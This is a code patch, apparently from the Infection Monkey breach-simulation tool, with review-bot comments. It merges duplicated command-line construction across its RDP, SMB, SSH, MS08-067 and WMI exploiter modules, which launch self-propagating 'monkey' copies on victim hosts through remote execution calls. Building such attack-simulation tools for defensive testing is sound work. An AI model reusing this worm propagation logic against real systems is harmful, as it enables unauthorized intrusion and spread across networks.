From 76e3350fa38c785b48278976b9e6c282a911465a Mon Sep 17 00:00:00 2001 From: itsikkes Date: Tue, 26 Jul 2016 18:52:58 +0300 Subject: [PATCH] merge duplicate code --- chaos_monkey/exploit/rdpgrinder.py | 10 ++-------- chaos_monkey/exploit/smbexec.py | 10 ++-------- chaos_monkey/exploit/sshexec.py | 11 ++--------- chaos_monkey/exploit/tools.py | 20 +++++++++++++++++++- chaos_monkey/exploit/win_ms08_067.py | 11 +++-------- chaos_monkey/exploit/wmiexec.py | 10 ++-------- 6 files changed, 30 insertions(+), 42 deletions(-) diff --git a/chaos_monkey/exploit/rdpgrinder.py b/chaos_monkey/exploit/rdpgrinder.py index ad803b326..abc9afe7b 100644 --- a/chaos_monkey/exploit/rdpgrinder.py +++ b/chaos_monkey/exploit/rdpgrinder.py @@ -13,6 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS from model.host import VictimHost from network.tools import check_port_tcp from exploit.tools import get_target_monkey +from tools import build_monkey_commandline __author__ = 'hoffer' KEYS_INTERVAL = 0.1 @@ -259,14 +260,7 @@ class RdpExploiter(HostExploiter): LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.") return False - cmdline = " -p " + self._guid - - if host.default_tunnel: - cmdline += " -t " + host.default_tunnel - if host.default_server: - cmdline += " -s " + host.default_server - if depth > 0: - cmdline += " -d %d" % (depth - 1) + cmdline = build_monkey_commandline(host, depth-1) if self._config.rdp_use_vbs_download: command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline} diff --git a/chaos_monkey/exploit/smbexec.py b/chaos_monkey/exploit/smbexec.py index 3acc928d2..e4e33a0d9 100644 --- a/chaos_monkey/exploit/smbexec.py +++ b/chaos_monkey/exploit/smbexec.py 
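Review bot: The new import `from tools import build_monkey_commandline` names the module differently from the line just above it, `from exploit.tools import get_target_monkey`, although both refer to chaos_monkey/exploit/tools.py. The bare `tools` spelling works only through Python 2 implicit relative imports and fails under Python 3, and the two spellings read as two different modules. Extending the existing line to `from exploit.tools import get_target_monkey, build_monkey_commandline` keeps a single import style. The import hunks in smbexec.py, sshexec.py, win_ms08_067.py and wmiexec.py have the same issue.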
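Review bot: `build_monkey_commandline(host, depth-1)` omits the spaces around the operator while the equivalent calls added in win_ms08_067.py and wmiexec.py use `depth - 1`; `cmdline = build_monkey_commandline(host, depth - 1)` would keep the five call sites uniform and PEP 8 conformant. smbexec.py and sshexec.py use the same unspaced spelling. The enclosing exploit method begins and ends outside this hunk.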
@@ -6,6 +6,7 @@ from exploit import HostExploiter from network.tools import check_port_tcp from exploit.tools import SmbTools, get_target_monkey from network import SMBFinger +from tools import build_monkey_commandline try: from impacket import smb @@ -104,14 +105,7 @@ class SmbExploiter(HostExploiter): else: cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path} - cmdline += " -p " + self._guid - - if host.default_tunnel: - cmdline += " -t " + host.default_tunnel - if host.default_server: - cmdline += " -s " + host.default_server - if depth > 0: - cmdline += " -d %d" % (depth - 1) + cmdline += build_monkey_commandline(host, depth-1) for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values(): rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, )) diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py index d6fcf52b5..717fc9bae 100644 --- a/chaos_monkey/exploit/sshexec.py +++ b/chaos_monkey/exploit/sshexec.py @@ -1,6 +1,7 @@ import paramiko import monkeyfs import logging +from tools import build_monkey_commandline from exploit import HostExploiter from model import MONKEY_ARG from exploit.tools import get_target_monkey @@ -19,7 +20,6 @@ class SSHExploiter(HostExploiter): def __init__(self): self._config = __import__('config').WormConfiguration - self._guid = __import__('config').GUID self._update_timestamp = 0 def log_transfer(self, transferred, total): @@ -118,14 +118,7 @@ class SSHExploiter(HostExploiter): try: cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) - cmdline += " -p " + self._guid - if host.default_tunnel: - cmdline += " -t " + host.default_tunnel - if host.default_server: - cmdline += " -s " + host.default_server - if depth > 0: - cmdline += " -d %d" % (depth - 1) - + cmdline += build_monkey_commandline(host, depth-1) cmdline += "&" ssh.exec_command(cmdline) 
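Review bot: Removing `self._guid = __import__('config').GUID` from `SSHExploiter.__init__` is the only such cleanup in this commit, while rdpgrinder.py, smbexec.py, win_ms08_067.py and wmiexec.py drop their only visible use of `self._guid` without touching their constructors. If those classes assign `self._guid` the same way (their `__init__` methods are outside the diff), the attribute is now dead there and should be removed too, or kept in SSHExploiter for consistency. It is also worth confirming that nothing else in sshexec.py, outside this hunk, still reads `self._guid`, since this removal would turn such a read into an AttributeError at exploit time.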
diff --git a/chaos_monkey/exploit/tools.py b/chaos_monkey/exploit/tools.py index d9f365aa9..7654abb30 100644 --- a/chaos_monkey/exploit/tools.py +++ b/chaos_monkey/exploit/tools.py @@ -396,4 +396,22 @@ def get_target_monkey(host): host.os.get('machine','').lower() == platform.machine().lower(): monkey_path = sys.executable - return monkey_path \ No newline at end of file + return monkey_path + + +def build_monkey_commandline(target_host, depth): + from config import WormConfiguration, GUID + + cmdline = "" + cmdline += " -p " + GUID + + if target_host.default_tunnel: + cmdline += " -t " + target_host.default_tunnel + if target_host.default_server: + cmdline += " -s " + target_host.default_server + if depth < 0: + depth = 0 + + cmdline += " -d %d" % depth + + return cmdline diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py index 0c038a535..a7bdf2d47 100644 --- a/chaos_monkey/exploit/win_ms08_067.py +++ b/chaos_monkey/exploit/win_ms08_067.py @@ -17,6 +17,7 @@ from . import HostExploiter from exploit.tools import SmbTools, get_target_monkey from network.tools import check_port_tcp from network import SMBFinger +from tools import build_monkey_commandline try: from impacket import smb @@ -230,6 +231,7 @@ class Ms08_067_Exploiter(HostExploiter): self._config.ms08_067_remote_user_pass, src_path, self._config.dropper_target_path) + if not remote_full_path: # try other passwords for administrator for password in self._config.psexec_passwords: @@ -250,14 +252,7 @@ class Ms08_067_Exploiter(HostExploiter): else: cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path} - cmdline += " -p " + self._guid - - if host.default_tunnel: - cmdline += " -t " + host.default_tunnel - if host.default_server: - cmdline += " -s " + host.default_server - if depth > 0: - cmdline += " -d %d" % (depth - 1) + cmdline += build_monkey_commandline(host, depth - 1) try: sock.send("start %s\r\n" % (cmdline, )) 
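Review bot: `WormConfiguration` is imported inside the new `build_monkey_commandline` but never used; `from config import GUID` is all the function needs. The helper also changes behaviour rather than only merging code: every removed call site emitted `-d` only when `depth > 0`, whereas the helper appends ` -d %d` unconditionally and clamps negatives to 0, so a caller with depth 0 now passes `-d 0` instead of nothing, which is harmless only if the monkey's default depth is 0. The first two statements can collapse to `cmdline = " -p " + GUID` and the clamp to `cmdline += " -d %d" % max(depth, 0)`. A docstring should state that `depth` is the value emitted via `-d` (callers pass `depth - 1`) and that `target_host.default_tunnel` and `target_host.default_server` are concatenated unvalidated into a command line that callers hand to a remote shell (`ssh.exec_command`, `sock.send("start %s\r\n" ...)`, `Win32_Process.Create`).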
diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py index 28dab01f3..86a34e5c5 100644 --- a/chaos_monkey/exploit/wmiexec.py +++ b/chaos_monkey/exploit/wmiexec.py @@ -2,6 +2,7 @@ import socket import ntpath import logging import traceback +from tools import build_monkey_commandline from model import DROPPER_CMDLINE, MONKEY_CMDLINE from model.host import VictimHost from exploit import HostExploiter @@ -85,14 +86,7 @@ class WmiExploiter(HostExploiter): else: cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path} - cmdline += " -p " + self._guid - - if host.default_tunnel: - cmdline += " -t " + host.default_tunnel - if host.default_server: - cmdline += " -s " + host.default_server - if depth > 0: - cmdline += " -d %d" % (depth - 1) + cmdline += build_monkey_commandline(host, depth - 1) # execute the remote monkey result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,